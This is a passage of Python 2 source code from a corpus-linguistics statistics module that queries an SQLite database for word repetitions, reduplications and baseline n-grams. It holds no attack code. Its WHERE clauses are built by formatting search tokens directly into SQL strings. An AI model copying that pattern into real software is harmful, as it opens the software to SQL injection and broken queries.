self.logger.error("Given SyntagmaType '{}' is not supported. Please select one of the following types: '{}'.".format(syntagma_type, Stats.supported_syntagma_type))
return False
if not inp_syntagma:
self.logger.error("NO InpSyntagma was given.")
return False
if sentiment and sentiment not in Stats.supported_sentiment:
self.logger.error("Given SentimentType '{}' is not supported. Please select one of the following types: '{}'. (!should be given in lower case!)".format(sentiment, Stats.supported_sentiment))
return False
indexes = self.col_index_min if minimum_columns else self.col_index_orig
if get_columns_repl or get_columns_redu or get_columns_baseline:
if not self._check_exist_columns_to_get( get_columns_repl, get_columns_redu,get_columns_baseline):
self.logger.error("Some given columns_to_get is not exist.")
return False
indexes_to_get_repl,indexes_to_get_redu,indexes_to_get_baseline = self._convert_cols_to_indexes(get_columns_repl,get_columns_redu,get_columns_baseline,indexes)
#print "2222"
# p("---888")
if not repl and not redu and not baseline:
self.logger.error("No Phenomena to export was selected. Please choice phenomena to export from the following list: '{}'. ".format(Stats.supported_phanomena_to_export))
return False
# p("---777")
if inp_syntagma == "*":
# p("---6666")
#print "333"
#p(inp_syntagma,"0000inp_syntagma")
num = self._get_row_num_in_baseline_with_rep(redu=redu, repl=repl, max_scope=max_scope)
#p(num, "num")
def intern_gen_all():
# p("---555")
#p(locals())
for baseline_container in self._baseline("*",max_scope=max_scope):
#inp_syntagma = self._preprocess_syntagma(inp_syntagma,thread_name=thread_name, syntagma_type=syntagma_type)
# p(max_scope, "max_scope")
# p(("---4444", baseline_container))
data = self._get_data_for_one_syntagma(baseline_container[0],repl=repl, redu=redu, baseline=False,
syntagma_type=syntagma_type, sentiment=sentiment,thread_name=thread_name, stemmed_search=False,
max_scope=max_scope, order_output_by_syntagma_order=order_output_by_syntagma_order,
return_full_tuple=return_full_tuple,delete_duplicates=delete_duplicates,
minimum_columns=minimum_columns,indexes=indexes)
# p(("--333", data))
#if data:
# sys.exit()
if data:
if baseline:
data["baseline"] = (baseline_container,)
if get_columns_repl or get_columns_redu or get_columns_baseline:
data = self._extract_certain_columns(data, indexes_to_get_repl,indexes_to_get_redu,indexes_to_get_baseline)
yield data
else:
if data is False:
yield False
return
if send_empty_marker:
yield None
continue
return LenGen(intern_gen_all(), num)
#self._empty_marker = None
else:
# p("---222")
#print "444"
inp_syntagma = self._preprocess_syntagma(inp_syntagma,thread_name=thread_name, syntagma_type=syntagma_type, stemmed_search=stemmed_search)
if not inp_syntagma:
self.logger.error("Error by preprocessing of the InpSyntagma.")
return False
#p(inp_syntagma, "555inp_syntagma")
if stemmed_search:
#print "555"
#p(temp_syntagma, "temp_syntagma")
where_num = "stemmed='{}'".format(self._baseline_delimiter.join(inp_syntagma) )
num = self.statsdb.rownum("baseline", where=where_num)
def intern_gen_2():
scope = len(inp_syntagma)
where = tuple(self._get_where_statement(inp_syntagma,scope=scope,thread_name=thread_name, with_context=False,syntagma_type="lexem", sentiment=sentiment, stemmed_search=True))#, splitted_syntagma=splitted_syntagma)
if not where:
yield False
return
for baseline_container in self._baseline(inp_syntagma,where=where, minimum_columns=minimum_columns,max_scope=max_scope,split_syntagma=True):
#p(baseline_container, "baseline_container")
data = self._get_data_for_one_syntagma(baseline_container[0],repl=repl, redu=redu, baseline=False, syntagma_type=syntagma_type,
sentiment=sentiment,thread_name=thread_name, max_scope=False, stemmed_search=False,
order_output_by_syntagma_order=order_output_by_syntagma_order,minimum_columns=minimum_columns,
return_full_tuple=return_full_tuple,delete_duplicates=delete_duplicates,indexes=indexes)
#p(data, "data")
if data:
data["baseline"] = (baseline_container,)
data["stem_syn"] = inp_syntagma
if get_columns_repl or get_columns_redu or get_columns_baseline:
data = self._extract_certain_columns(data, indexes_to_get_repl,indexes_to_get_redu,indexes_to_get_baseline)
#p(data, "data")
yield data
else:
if send_empty_marker:
yield None
#else:
# yield {}
if if_type_pos_return_lexem_syn and syntagma_type=="pos":
#p("if_type_pos_return_lexem_syn")
return self._lexem_syn_extractor_from_pos(inp_syntagma, intern_gen_2(),  # use the generator defined in this branch
repl=repl, redu=redu, baseline=baseline,
sentiment=sentiment,
minimum_columns=minimum_columns,order_output_by_syntagma_order=order_output_by_syntagma_order, return_full_tuple=return_full_tuple,delete_duplicates=delete_duplicates,
get_columns_repl=get_columns_repl,get_columns_redu=get_columns_redu,get_columns_baseline=get_columns_baseline)
else:
return LenGen(intern_gen_2(), num)
else:
#print "666"
def inter_gen_3():
data = self._get_data_for_one_syntagma(inp_syntagma,repl=repl, redu=redu, baseline=baseline, syntagma_type=syntagma_type,
sentiment=sentiment,thread_name=thread_name, max_scope=max_scope, stemmed_search=False,
order_output_by_syntagma_order=order_output_by_syntagma_order,minimum_columns=minimum_columns,
return_full_tuple=return_full_tuple,delete_duplicates=delete_duplicates,indexes=indexes)
if data:
if get_columns_repl or get_columns_redu or get_columns_baseline:
data = self._extract_certain_columns(data, indexes_to_get_repl,indexes_to_get_redu,indexes_to_get_baseline)
#p(data, "data")
yield data
else:
if send_empty_marker:
yield None
if if_type_pos_return_lexem_syn and syntagma_type=="pos":
#p("if_type_pos_return_lexem_syn")
return self._lexem_syn_extractor_from_pos(inp_syntagma,inter_gen_3(),
repl=repl, redu=redu, baseline=baseline,
sentiment=sentiment,
minimum_columns=minimum_columns,order_output_by_syntagma_order=order_output_by_syntagma_order, return_full_tuple=return_full_tuple,delete_duplicates=delete_duplicates,
get_columns_repl=get_columns_repl,get_columns_redu=get_columns_redu,get_columns_baseline=get_columns_baseline)
else:
return LenGen(inter_gen_3(), 1)
def _get_data_for_one_syntagma(self,inp_syntagma_splitted, inp_syntagma_unsplitted=False,
repl=False, redu=False, baseline=False, syntagma_type="lexem", additional_pos_where=False,
sentiment=False,thread_name="Thread0", max_scope=False,
for_optimization=False, stemmed_search=False, get_also_non_full_repetativ_result=False,
#get_columns_repl=False, get_columns_redu=False,get_columns_baseline=False,
order_output_by_syntagma_order=False, return_full_tuple=False, output_type="list",
minimum_columns=False, delete_duplicates=True, indexes=False, ):#,splitted_syntagma=True):
#p((inp_syntagma_splitted, repl, redu, baseline,stemmed_search,additional_pos_where))
#p(locals())
scope = len(inp_syntagma_splitted)
if not self._is_syntagma_scope_right(scope):
#self.logger.error("The Length ('{}') of Given SyntagmaToSearch ('{}') is bigger as allow ('{}'). Please recompute StatsDB with the bigger ContextNumber.".format(scope, inp_syntagma_splitted,self._avaliable_scope))
#if isinstance()
return None
if stemmed_search:
inp_syntagma_splitted = self._preprocess_syntagma(inp_syntagma_splitted,thread_name=thread_name, syntagma_type=syntagma_type, stemmed_search=stemmed_search)
if inp_syntagma_unsplitted:
inp_syntagma_unsplitted = self._baseline_delimiter.join(inp_syntagma_splitted)
if not indexes:
indexes = self.col_index_min if minimum_columns else self.col_index_orig
#p(indexes, "indexes")
_repl = []
_redu = []
_baseline = []
#p(syntagma_type, "syntagma_type")
#p(scope,"scope2")
where1 = False
if repl:
if not where1:
where1 = tuple(self._get_where_statement(inp_syntagma_splitted,scope=scope,thread_name=thread_name,
with_context=True,syntagma_type=syntagma_type, sentiment=sentiment,
inp_syntagma_unsplitted=inp_syntagma_unsplitted,stemmed_search=stemmed_search,
additional_pos_where=additional_pos_where))#, splitted_syntagma=splitted_syntagma)
if not where1: return False
#p(where1,"where1_repl", c="b")
_repl = self.get_reps("repl",inp_syntagma_splitted,scope,where1,indexes,thread_name=thread_name, minimum_columns=minimum_columns,
order_output_by_syntagma_order=order_output_by_syntagma_order, return_full_tuple=return_full_tuple,stemmed_search=False,
output_type=output_type,delete_duplicates=delete_duplicates,
syntagma_type=syntagma_type, for_optimization=for_optimization, get_also_non_full_repetativ_result=get_also_non_full_repetativ_result)
#p(_repl, "_repl")
# if get_columns_repl:
# if minimum_columns:
# self.logger.error("IllegalState: 'minimum_columns'-Option is True. It is not allow to get certain columns, if this option is true. Please switch off this option.")
# return {}
if redu:
if not where1:
where1 = tuple(self._get_where_statement(inp_syntagma_splitted,scope=scope,thread_name=thread_name, with_context=True,
syntagma_type=syntagma_type, sentiment=sentiment, inp_syntagma_unsplitted=inp_syntagma_unsplitted,
stemmed_search=stemmed_search,additional_pos_where=additional_pos_where))#, splitted_syntagma=splitted_syntagma)
if not where1: return False
#p(where1,"where1_redu", c="b")
_redu = self.get_reps("redu",inp_syntagma_splitted,scope,where1,indexes,thread_name=thread_name, minimum_columns=minimum_columns,
order_output_by_syntagma_order=order_output_by_syntagma_order, return_full_tuple=return_full_tuple,stemmed_search=False,
output_type=output_type,delete_duplicates=delete_duplicates,
syntagma_type=syntagma_type, for_optimization=for_optimization, get_also_non_full_repetativ_result=get_also_non_full_repetativ_result)
#p((repl,_repl, redu, _redu))
if baseline:
if syntagma_type == "lexem":
where2 = tuple(self._get_where_statement(inp_syntagma_splitted,scope=scope,thread_name=thread_name, with_context=False,syntagma_type=syntagma_type, sentiment=sentiment, inp_syntagma_unsplitted=inp_syntagma_unsplitted,stemmed_search=stemmed_search, additional_pos_where=additional_pos_where))#, splitted_syntagma=splitted_syntagma)
if not where2: return False
_baseline = tuple(self._baseline(inp_syntagma_splitted,where=where2,minimum_columns=minimum_columns, thread_name=thread_name))
else:
all_syntagmas = []
if _repl:
all_syntagmas += self._extract_all_syntagmas(_repl, "repl", ordered_output_by_syntagma_order=order_output_by_syntagma_order,minimum_columns=minimum_columns)
if _redu:
all_syntagmas += self._extract_all_syntagmas(_redu, "redu", ordered_output_by_syntagma_order=order_output_by_syntagma_order,minimum_columns=minimum_columns)
#p(all_syntagmas,"all_syntagmas")
for temp_syntagma in set(all_syntagmas):
#p(temp_syntagma, "temp_syntagma")
where2 = tuple(self._get_where_statement(temp_syntagma,scope=scope,thread_name=thread_name, with_context=False,syntagma_type="lexem", sentiment=sentiment,
inp_syntagma_unsplitted=inp_syntagma_unsplitted,stemmed_search=stemmed_search,
additional_pos_where=False))#, splitted_syntagma=splitted_syntagma)
if not where2: return False
_baseline += tuple(self._baseline(temp_syntagma,where=where2, minimum_columns=minimum_columns,thread_name=thread_name))
#p((inp_syntagma_splitted,_repl, _redu, _baseline,))
if not _repl and not _redu and not _baseline:
return {}
if return_full_tuple:
#p((_repl, _redu,_baseline))
if not (_repl and _repl[0]) and not (_redu and _redu[0]) and not _baseline:
return {}
return {"repl":_repl, "redu":_redu, "baseline":_baseline,"syntagma":inp_syntagma_splitted}
def get_reps(self, rep_type,inp_syntagma_splitted,scope,where,indexes,thread_name="Thread0",
order_output_by_syntagma_order=False, return_full_tuple=False, stemmed_search=False,
output_type="list", minimum_columns=False,
delete_duplicates=True, syntagma_type="lexem", for_optimization=False,
get_also_non_full_repetativ_result=False):
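# Collects replication ("repl") or reduplication ("redu") rows from the stats DB,
# one query per WHERE clause in `where`. With order_output_by_syntagma_order the
# result is a list of (word, rows) pairs, otherwise a flat tuple of rows. With
# for_optimization only the existence of at least one match is reported. For
# scope > 1 the rows can additionally be reduced to contiguous "full repetitive"
# syntagmas and de-duplicated; return_full_tuple also reports that information.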
#p((rep_type,inp_syntagma_splitted,scope),"get_reps_BEGINN", c="r")
### Step 1: Variables Initialization
_rep = []
is_full_repetativ = True
#if for_optimization:
# col_to_get = "id"
#else:
col_to_get = Stats.min_col[rep_type] if minimum_columns else False
#p((rep_type, inp_syntagma_splitted, get_also_non_full_repetativ_result, for_optimization, scope,where))
# p((where), "where_by_get_reps")
### Step 2:
if order_output_by_syntagma_order:
for word,w in izip(inp_syntagma_splitted,where):
current_reps = tuple(self._rep_getter_from_db(rep_type,inp_syntagma_splitted,scope=scope,where=w,thread_name=thread_name,columns=col_to_get, output_type=output_type, for_optimization=for_optimization))
#if not current_reps:
# return False
#p( current_reps, " current_reps")
# p((current_reps, w))
#for
if current_reps:
if for_optimization: return True # if there is a match, then return True
else:
if for_optimization: continue
is_full_repetativ = False
if self._full_repetativ_syntagma:
if not get_also_non_full_repetativ_result:
_rep = ()
break
_rep.append( (word,current_reps))
if for_optimization: return False # reaching this point means no match was found so far
### Check, if reps in containers are empty
i = 0
for container in _rep:
if not container[1]:
i += 1
if len(_rep) == i:
_rep = ()
else:
for w in where:
#p(w, "w_in_rep", c="c")
#print 1111
current_reps = tuple(self._rep_getter_from_db(rep_type,inp_syntagma_splitted,scope=scope,where=w,thread_name=thread_name,columns=col_to_get, output_type=output_type, for_optimization=for_optimization))
#print "current_reps= ", current_reps
if current_reps:
#print 22222
if for_optimization: return True # if there is a match, then return True
else:
#print 3333
if for_optimization: continue
is_full_repetativ = False
if self._full_repetativ_syntagma:
if not get_also_non_full_repetativ_result:
_rep = ()
break
#print 4444
_rep += current_reps
if for_optimization: return False # reaching this point means no match was found so far
#print 555
if _rep:
## Step 5:
if get_also_non_full_repetativ_result: return _rep
id_ix = indexes[rep_type]["id"]
if self._full_repetativ_syntagma and scope > 1 and is_full_repetativ:
reconstructed,length = self._reconstruct_syntagma(rep_type, _rep, order_output_by_syntagma_order,indexes,syntagma_type=syntagma_type,stemmed_search=stemmed_search)
full_syntagmas, allowed_ids = self._exctract_full_syntagmas(reconstructed,scope,length,inp_syntagma_splitted,syntagma_type=syntagma_type)
_rep = self._filter_full_rep_syn(rep_type,_rep, allowed_ids,order_output_by_syntagma_order ,id_ix) #
if delete_duplicates:
_rep = self._delete_dublicats_in_reps( _rep, order_output_by_syntagma_order,id_ix)
### Step 6:
if return_full_tuple:
try:
full_syn_sum = len(full_syntagmas) if _rep else 0
except:
full_syn_sum = None
if _rep:
return (_rep, is_full_repetativ, full_syn_sum)
else:
return _rep
else:
return _rep
def _reconstruct_syntagma(self,rep_type, reps, order_output_by_syntagma_order,indexes,syntagma_type="lexem",stemmed_search=False,):
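# Rebuilds a per-document position tree from the fetched rows:
# reconstr_tree[doc_id][sent_ix][tok_ix] = [word_or_pos, (row ids, ...)],
# where sent_ix/tok_ix come from the JSON column "index_in_redufree". The
# redu-free sentence lengths ("redufree_len") are collected per document as
# well; both structures are used to detect contiguous (full) syntagmas.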
#p((rep_type, reps, inp_syntagma_splitted, scope,minimum_columns,order_output_by_syntagma_order))
#p(indexes)
reconstr_tree = defaultdict(lambda: defaultdict(lambda: defaultdict(lambda:[None,tuple()])))
#reconstr_tree = defaultdict(lambda: defaultdict(lambda: defaultdict(tuple)))
length = {}
indexes = indexes[rep_type]
word_tag = "stemmed" if stemmed_search else 'normalized_word'
syn_ix = indexes[word_tag] if syntagma_type == "lexem" else indexes['pos']
#p(syn_ix,"syn_ix")
#p(indexes['normalized_word'], "indexes['normalized_word']")
#p(indexes['pos'],"indexes['pos']")
if order_output_by_syntagma_order:
for word, reps_bunch in reps:
#word = reps_container[0]
#reps_bunch = reps_container[1]
for i, rep in enumerate(reps_bunch):
#p((i, rep))
#p(rep[syn_ix])
doc_id = rep[indexes["doc_id"]]
index_in_redufree = json.loads(rep[indexes["index_in_redufree"]])
if doc_id not in length:
length[doc_id] = json.loads(rep[indexes["redufree_len"]])
reconstr_tree[doc_id][index_in_redufree[0]][index_in_redufree[1]][1] += (rep[indexes["id"]],)
if not reconstr_tree[doc_id][index_in_redufree[0]][index_in_redufree[1]][0]:
reconstr_tree[doc_id][index_in_redufree[0]][index_in_redufree[1]][0] = rep[syn_ix]
#+= (rep[indexes["id"]],)
else:
for i,rep in enumerate(reps):
#p((i, rep))
doc_id = rep[indexes["doc_id"]]
index_in_redufree = json.loads(rep[indexes["index_in_redufree"]])
if doc_id not in length:
length[doc_id] = json.loads(rep[indexes["redufree_len"]])
reconstr_tree[doc_id][index_in_redufree[0]][index_in_redufree[1]][1] += (rep[indexes["id"]],)
if not reconstr_tree[doc_id][index_in_redufree[0]][index_in_redufree[1]][0]:
reconstr_tree[doc_id][index_in_redufree[0]][index_in_redufree[1]][0] = rep[syn_ix]
#p({ d:{s:{t:ids for t, ids in s_data.iteritems()} for s, s_data in doc_data.iteritems()} for d, doc_data in reconstr_tree.iteritems()})
return reconstr_tree,length
def _exctract_full_syntagmas(self,reconstr_tree, scope, redu_free_elem_length,inp_syntagma_splitted,syntagma_type="lexem"):
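# Walks the reconstructed tree in document/sentence/token order and searches for
# runs of consecutive token positions (a run may continue across a sentence
# boundary when the previous token was the last one of its sentence). A run of
# exactly `scope` positions that starts with the first word of the searched
# syntagma is accepted. Returns the accepted index tuples together with the set
# of row ids that belong to them, or (False, False) if an exception occurred.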
#p((reconstr_tree, scope, redu_free_elem_length,inp_syntagma_splitted,syntagma_type))
try:
#if syntagma_type == "pos":
output_ix = ()
allowed_ids = ()
start_new = False
incr = False
cont = False
orig_first_word = inp_syntagma_splitted[0]
#pos = True if syntagma_type=="pos" else False
for doc_id, doc_data in dict(sorted(reconstr_tree.items())).iteritems():
redu_free_length = [l-1 for l in redu_free_elem_length[doc_id]] # convert length to index
current_syn_ixs = ()
syn_start_word = None
start_tok = None
temp_tok = None
last_token = None
last_sent = None
temp_ids = ()
counter_full_syn = 0
for current_sent, sents_data in dict(sorted(doc_data.items())).iteritems():
for current_tok in sorted(sents_data.keys()):
# p((doc_id,current_sent,current_tok,start_tok, current_syn_ixs),c="m")
if temp_tok:
# print ",,,,,,"
tok_to_use = temp_tok
else:
# print "...."
tok_to_use = start_tok
if not start_tok:
# print "111"
last_token = current_tok
start_tok = (current_sent,current_tok)
start_new = True
counter_full_syn = 1
else:
# print "2222"
# print tok_to_use, counter_full_syn,current_tok
if (tok_to_use[1]+counter_full_syn) == current_tok:
# print "222+++"
counter_full_syn += 1
incr = True
else:#
# print "222---"
#print current_tok, (current_sent,last_sent), (last_token,redu_free_length[last_sent])
if current_tok==0 and ((current_sent-last_sent) == 1) and (last_token==redu_free_length[last_sent]): # if the first token of the next sent build full_syntagma with the last token of the last sent
# print "222!!!"
temp_tok = (current_sent, current_tok)
counter_full_syn = 1
incr = True
else:
# print "222???"
start_new = True
#i = 0
while True:
#i+=1
#if i >3: break
if start_new:
# p("STARTED",c="m")
start_new = False
incr = True
# p(len(current_syn_ixs),"len(current_syn_ixs)")
if len(current_syn_ixs) == scope:
# p("SAVED",c="m")
output_ix += (current_syn_ixs,)
#output_words += ((current_syn_words),)
#output_doc_id += (doc_id,)
allowed_ids += temp_ids
# Clean old vars
current_syn_ixs=()
syn_start_word = sents_data[current_tok][0]
# print orig_first_word, syn_start_word
if orig_first_word not in syn_start_word:
# print "NOT ORIG AS START"
cont = True
break
#syn_start_word = None
temp_ids = ()
temp_tok = None
start_tok = (current_sent,current_tok)
counter_full_syn = 1
# print "+++", counter_full_syn,syn_start_word
if incr:
incr = False
# p("INCR_START",c="m")
# print "!!!!!!!", syn_start_word, sents_data[current_tok]
if syn_start_word:
# p((syn_start_word,sents_data[current_tok][0], counter_full_syn, current_syn_ixs,current_tok,sents_data[current_tok]),c="r")
#if syn_start_word == sents_data[current_tok][0] and counter_full_syn>1 and not pos:
# # p("START NEW",c="m")
# start_new = True
# continue
if len(current_syn_ixs)==scope:
start_new = True
continue
current_syn_ixs += ((current_sent,current_tok),)
curr_rep = sents_data[current_tok]
#current_syn_words += (curr_rep[0],)
#syn_start_word = curr_rep[0]
temp_ids += tuple(curr_rep[1])
# p("INCR_DONE",c="m")
break
if cont:
cont = False
continue
last_token = current_tok
last_sent = current_sent
if len(current_syn_ixs) == scope:
output_ix += (current_syn_ixs,)
allowed_ids += temp_ids
#p((output_ix, set(allowed_ids)))
return output_ix, set(allowed_ids)
except Exception as e:
self.logger.error("Exception was throwed: '{}'.".format(repr(e)) ,exc_info=self._logger_traceback)
return False, False
def _delete_dublicats_in_reps(self,reps,order_output_by_syntagma_order,id_ix):
new_reps = []
used_id = set()
if order_output_by_syntagma_order:
for word, reps in reps[::-1]:
temp_reps = ()
for rep in reps:
rep_id = rep[id_ix]
if rep_id not in used_id:
used_id.add(rep_id)
temp_reps += (rep,)
if temp_reps:
new_reps.append( (word,temp_reps) )
else:
if self._full_repetativ_syntagma:
new_reps = ()
break
else:
new_reps.append( (word,temp_reps) )
new_reps = new_reps[::-1]
else:
#new_reps = ()
for rep in reps:
rep_id = rep[id_ix]
if rep_id not in used_id:
used_id.add(rep_id)
new_reps.append( rep)
return new_reps
def _filter_full_rep_syn(self,rep_type,_rep, allowed_ids,order_output_by_syntagma_order, id_index):
#p((rep_type,_rep, allowed_ids,order_output_by_syntagma_order), c="r")
new_reps = []
if order_output_by_syntagma_order:
for word, reps in _rep:
temp_reps = ()
for rep in reps:
if rep[id_index] in allowed_ids:
temp_reps += (rep,)
if temp_reps:
new_reps.append((word,temp_reps))
else:
new_reps = ()
break
else:
#new_reps = ()
for rep in _rep:
if rep[id_index] in allowed_ids:
new_reps.append(rep)
if not new_reps:
new_reps = ()
#break
return new_reps
def _rep_getter_from_db(self, rep_type,inp_syntagma="*", scope=False,
where=False, output_type="list", size_to_get=1000,
columns=False,thread_name="Thread0",
for_optimization=False,):
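# Lazily yields rows from the replications/reduplications table selected via
# Stats.phenomena_table_map[rep_type], restricted by the given WHERE clause and
# columns. With for_optimization it only yields a single True when at least one
# matching row exists (and nothing otherwise).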
if inp_syntagma != "*":
if not where:
self.logger.error("Where wasn't given.")
#yield False
return
try:
table_name = Stats.phenomena_table_map[rep_type]
except:
self.logger.error("Given RepType ('{}') is not exist.".format(rep_type))
#yield False
return
generator = self.statsdb.lazyget(table_name, columns=columns, where=where, connector_where="AND", output=output_type, case_sensitiv=self._case_sensitiv,thread_name=thread_name)
if for_optimization:
try:
next(generator)
yield True
return
except StopIteration:
#pass
return
for row in generator:
yield row
def _extract_all_syntagmas(self, entry, typ, ordered_output_by_syntagma_order=False,minimum_columns=False):
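# Derives all prefix sub-syntagmas (length 1 .. available scope) from the given
# rows: position 0 is the matched word itself, the following positions are read
# from the right-context columns; building stops at the first empty slot. The
# resulting set of word tuples is later used to query the baseline table.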
#p(ordered_output_by_syntagma_order, "ordered_output_by_syntagma_order")
all_syntagmas = set()
#p(entry, "entry")
if ordered_output_by_syntagma_order:
for word_container in entry:
for rep in word_container[1]:
done = False
for index in xrange(1, self._avaliable_scope+1):
temp_syntagma = []
for i in xrange(index):
#p(self._get_index_by_codepoint(i, typ), "self._get_index_by_codepoint(i, typ)")
word = rep[self._get_index_by_codepoint(i, typ,minimum_columns)]
#temp_syntagma.append(word)
if word:
temp_syntagma.append(word)
else:
#break
done=True
if done: break
#p(temp_syntagma,"{}temp_syntagma".format(typ))
all_syntagmas.add(tuple(temp_syntagma))
#all_syntagmas.add(temp_syntagma)
if done: break
else:
#p(entry, "entry", c="r")
for rep in entry:
#p(rep,"rep", c="r")
done = False
for index in xrange(1, self._avaliable_scope+1):
temp_syntagma = []
for i in xrange(index):
#p(self._get_index_by_codepoint(i, typ), "self._get_index_by_codepoint(i, typ)")
word = rep[self._get_index_by_codepoint(i, typ,minimum_columns)]
#temp_syntagma.append(word)
#p(word, "word", c="m")
if word:
temp_syntagma.append(word)
else:
#break
done=True
if done: break
#p(temp_syntagma,"{}temp_syntagma".format(typ))
all_syntagmas.add(tuple(temp_syntagma))
#all_syntagmas.add(temp_syntagma)
if done: break
#all_syntagmas.append(temp_syntagma)
#p(all_syntagmas,"set_all_syntagmas")
return all_syntagmas
def _baseline(self, inp_syntagma="*", max_scope=False, where=False, connector_where="AND", output="list", size_to_fetch=1000, thread_name="Thread0", split_syntagma=True,minimum_columns=False ,limit=-1, offset=0):
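# Lazily yields rows from the baseline table. For inp_syntagma == "*" an optional
# "scope <= max_scope" condition is merged into the WHERE clause; otherwise a
# WHERE clause is required. When split_syntagma is set, the stored syntagma
# string (first column) is split back into tokens using the baseline delimiter.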
#temp_cols_to_get = Stats.min_col["baseline"] if minimum_columns else False
#columns = columns if columns else temp_cols_to_get
columns = Stats.min_col["baseline"] if minimum_columns else False
#p((where, inp_syntagma,max_scope))
# p(locals())
if inp_syntagma == "*":
if max_scope is not False:
w = "scope <= {}".format(max_scope)
if where:
if isinstance(where, (list, tuple)):
#answer = None
ix = None
for index, tw in enumerate(where):
if "scope" in tw:
ix = index
if ix is not None:
where[ix] = w
else:
where.append(w)
if connector_where != "AND":
self.logger.error("PossibleWrongData: ConnectorWhere is 'OR' but should be 'AND'")
else:
temp_where = [where]
if "scope" not in where:
temp_where.append(w)
where = temp_where
else:
temp_where = [w]
else:
where = w
#baseline_num = len(list(self.statsdb.lazyget("baseline", columns=columns, where=where, connector_where=connector_where, output=output, case_sensitiv=self._case_sensitiv,thread_name=thread_name+"BSGET",limit=limit, offset=offset, size_to_fetch=size_to_fetch)))
# p((where,max_scope,baseline_num), "where")
# print 000
for row in self.statsdb.lazyget("baseline", columns=columns, where=where, connector_where=connector_where, output=output, case_sensitiv=self._case_sensitiv,thread_name=thread_name+"BSGET",limit=limit, offset=offset, size_to_fetch=size_to_fetch):
# p(row, "row")
# print 111
if split_syntagma and row:
# print 222
#temp_row = list(row)
#row = list(row)
splitted_syntagma = row[0].split(self._baseline_delimiter)
#row[0] = splitted_syntagma
r = (splitted_syntagma,) + row[1:]
# p((r, split_syntagma))
yield (splitted_syntagma,) + row[1:]
#yield splitted_syntagma
else:
# p((row, split_syntagma))
yield row
else:
if not where:
self.logger.error("Where wasn't given.")
yield False
return
for row in self.statsdb.lazyget("baseline", columns=columns, where=where, connector_where="AND", output=output, case_sensitiv=self._case_sensitiv,limit=limit, offset=offset):
#p(row, "row")
if split_syntagma and row:
row = list(row)
row[0] = row[0].split(self._baseline_delimiter)
yield row
#sys.exit()
def _get_index_by_codepoint(self, codepoint, typ,minimum_columns):
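# Maps a position inside a syntagma to a column index: position 0 is the matched
# word itself ("normalized_word"), position 1 is "contextR1", and every further
# position steps two columns to the right, apparently skipping the interleaved
# context_info columns.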
indexes = self.col_index_min[typ] if minimum_columns else self.col_index_orig[typ]
if codepoint == 0:
return indexes["normalized_word"]
elif codepoint == 1:
return indexes["contextR1"]
else:
return indexes["contextR1"] + (2* (codepoint-1))
def _get_where_statement(self,inp_syntagma_splitted, inp_syntagma_unsplitted=False,
scope=False, syntagma_type="lexem", sentiment=False,thread_name="Thread0",
with_context=True,stemmed_search=False, additional_pos_where=False):#, splitted_syntagma=True):
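# Builds SQL WHERE fragments for a syntagma. With context (repl/redu tables) one
# clause list is yielded per possible anchor position: the anchor token is matched
# against the word/stemmed/pos column and the remaining tokens against the left
# and right context columns (plain equality for lexems, json_extract for pos or
# stemmed searches), optionally with extra pos constraints and a sentiment filter.
# Without context a single equality on the baseline "syntagma"/"stemmed" column is
# yielded. On Unicode errors the inputs are decoded to UTF-8 and the loop retries.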
### Syntagma Preprocessing
#o = type(inp_syntagma_splitted)
#p((inp_syntagma_splitted, o))
status= True
convert = False
if syntagma_type != "pos":
try:
if not inp_syntagma_unsplitted:
try:
inp_syntagma_unsplitted = self._baseline_delimiter.join(inp_syntagma_splitted)
except TypeError:
inp_syntagma_unsplitted = self._baseline_delimiter.join([unicode(syntagma) for syntagma in inp_syntagma_splitted])
except (UnicodeDecodeError, UnicodeEncodeError):
convert = True
while status:
if convert:
#p( inp_syntagma_splitted, "1 inp_syntagma_splitted")
try:
inp_syntagma_splitted = [word.decode("utf-8") for word in inp_syntagma_splitted]
except (UnicodeDecodeError, UnicodeEncodeError):
pass
try:
if inp_syntagma_unsplitted:
try:
inp_syntagma_unsplitted = inp_syntagma_unsplitted.decode("utf-8")
except (UnicodeDecodeError, UnicodeEncodeError):
pass
else:
inp_syntagma_unsplitted = self._baseline_delimiter.join(inp_syntagma_splitted)
#p(repr(inp_syntagma_unsplitted), "inp_syntagma_unsplitted")
except (UnicodeDecodeError, UnicodeEncodeError):
inp_syntagma_unsplitted = self._baseline_delimiter.join([unicode(t) for t in inp_syntagma_splitted])
#p(repr(inp_syntagma_unsplitted), "2 inp_syntagma_unsplitted")
try:
additional_pos_where = [word.decode("utf-8") for word in additional_pos_where]
except:
pass
#p(inp_syntagma_splitted, "inp_syntagma_splitted")
try:
#wheres = []
if with_context: # for repl and redu
if syntagma_type == "lexem":
if stemmed_search:
normalized_word_tag_name = "stemmed"
else:
normalized_word_tag_name = "normalized_word"
else:
normalized_word_tag_name = "pos"
#normalized_word_tag_name = "normalized_word" if syntagma_type == "lexem" else "pos"
if stemmed_search:
context_tag_name_r = "context_infoR"
context_tag_name_l = "context_infoL"
word_index = 2
else:
context_tag_name_r = "contextR" if syntagma_type == "lexem" else "context_infoR"
context_tag_name_l = "contextL" if syntagma_type == "lexem" else "context_infoL"
word_index = 0
# splitted_syntagma = inp_syntagma_splitted if splitted_syntagma else inp_syntagma_splitted.split(self._baseline_delimiter)
# unsplitted_syntagma = inp_syntagma_splitted if splitted_syntagma else inp_syntagma_splitted.split(self._baseline_delimiter)
if scope > self.baseline_ngramm_lenght:
self.logger.error("WhereGetter: Given Scope ('{}') is higher as allow ('{}'). (given syntagma:'{}'). ".format(scope, self.baseline_ngramm_lenght, inp_syntagma_splitted))
#yield False
return
for token_index in xrange(scope):
last_token_index = scope-1
where = []
for i, token in zip(range(scope),inp_syntagma_splitted):
#p(token, "token")
#token = token.replace("'", '"') if "'" in token else token
if i < token_index:
#ix = token_index -1
#json_extract("text", "$[1]")
col_name = u"{}{}".format(context_tag_name_l,token_index-i)
search_pattern = u"{}='{}'".format(col_name,token) if syntagma_type == "lexem" and not stemmed_search else u'json_extract("{}", "$[{}]") = "{}"'.format(col_name,word_index,token)
#search_pattern = u"='{}'".format(token) if syntagma_type == "lexem" else u"LIKE '%{}%'".format(token)
where.append(search_pattern)
if additional_pos_where and syntagma_type!="pos":
col_name = u"{}{}".format("context_infoL",token_index-i)
search_pattern = u'json_extract("{}", "$[0]") = "{}"'.format(col_name,additional_pos_where[i])
where.append(search_pattern)
#where.append(u"{}{} {} ".format(context_tag_name_l,token_index-i,search_pattern))
elif i == token_index:
where.append(u"{}='{}' ".format(normalized_word_tag_name,token))
if additional_pos_where and syntagma_type!="pos":
where.append(u" pos = '{}' ".format(additional_pos_where[i]))
elif i > token_index:
col_name = u"{}{}".format(context_tag_name_r,i-token_index)
